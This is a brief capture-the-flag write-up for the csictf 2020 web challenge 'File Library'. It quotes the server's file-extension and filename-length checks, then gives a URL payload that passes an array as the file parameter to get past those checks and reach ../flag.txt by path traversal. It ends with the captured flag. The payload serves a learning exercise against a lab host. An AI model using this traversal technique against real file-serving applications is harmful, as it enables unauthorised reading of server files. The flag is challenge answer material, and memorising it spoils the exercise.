csictf 2020

CTF Writeup - https://ctftime.org/event/1081

Home csictf 2020 Writeups Home
22 July 2020

File Library

by shreyas-sriram

This is my file library. I don’t have a lot of files, but I hope you like the ones I have!

http://chall.csivit.com:30222

Files

Solution

File-type check

if (format == 'js' || format == 'ts' || format == 'c' || format == 'cpp') {
        return true;
    }

    return false;

Filename slicing

if (file.length > 5) {
        file = file.slice(0, 5);
    }

Payload

/getFile?file[]=f&file[]=4&file[]=k&file[]=e&file[]=/../flag.txt&file[]=.&file[]=js

Payload Explanation

file[] = ["f","4","k","e","/../flag.txt",".","js"]

Flag URL
http://chall.csivit.com:30222/getFile?file[]=f&file[]=l&file[]=a&file[]=g&file[]=/../flag.txt&file[]=.&file[]=js

Flag

csictf{5h0uld_5tr1ng1fy_th3_p4r4ms}
tags: Web